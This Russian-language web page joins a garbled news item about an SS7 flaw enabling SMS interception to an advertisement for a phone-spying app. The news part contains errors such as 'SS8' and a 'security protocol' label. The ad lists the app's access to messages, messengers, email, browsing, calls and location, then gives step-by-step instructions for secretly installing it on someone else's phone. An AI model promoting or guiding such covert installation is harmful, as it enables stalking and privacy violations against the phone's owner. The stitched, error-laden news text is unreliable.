Уязвимость протокола SS7 позволяет перехватывать SMS

030 По информации издания The Washington Post, в протоколе безопасности SS7, который активно используется многими поставщиками сотовой связи, была найдена крупная уязвимость. Эта брешь может быть использована в подавляющем большинстве случаев применения SS7, поскольку телефонные станции всего мира уже давно взяли данный протокол на вооружение. Немецкие исследователи установили, что уязвимость в защите не требует каких-то особых знаний в области хакинга.

Ситуация с перехватом сообщений вероятна даже в том случае, если поставщиками услуг используются совершенные алгоритмы шифрования данных, основанные на сложнейших вычислениях. Специалисты считают, что в определённые моменты времени может возникать так называемый «чистый» трафик, к которому не применяются никакие шифровки. Происходит это в ситуации, когда пользователь достаточно быстро перемещается на местности (за рулём автомобиля, например), меняя соты связи. Именно в момент смены доступ к трафику и становится открытым. Виной всему несовершенные меры по безопасности, принятые в SS8.

Даже относительно небольших знаний в этой области достаточно, чтобы научиться точно вычислять текущее местоположение абонента сотовой сети. Злоумышленник будет способен перехватывать не только SMS, но и зашифрованные телефонные разговоры. В дальнейшем их можно расшифровать. Более детальный доклад об этой ошибке представлен на конференции в Гамбурге, которая состоялась в конце декабря прошлого года.

Разработчики протокола SS7 уже работают над обновлением всей системы, однако переход каждого мобильного оператора на апдейт способен занять немало времени. Пока этого не случится, конфиденциальные данные абонентов могут стать доступными третьим лицам. Впрочем, специалисты в области IT и раньше неоднократно заявляли о том, что наиболее важные сведения (пароли, данные пластиковых карточек) не следует отправлять по SMS, или диктовать по мобильному телефону.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.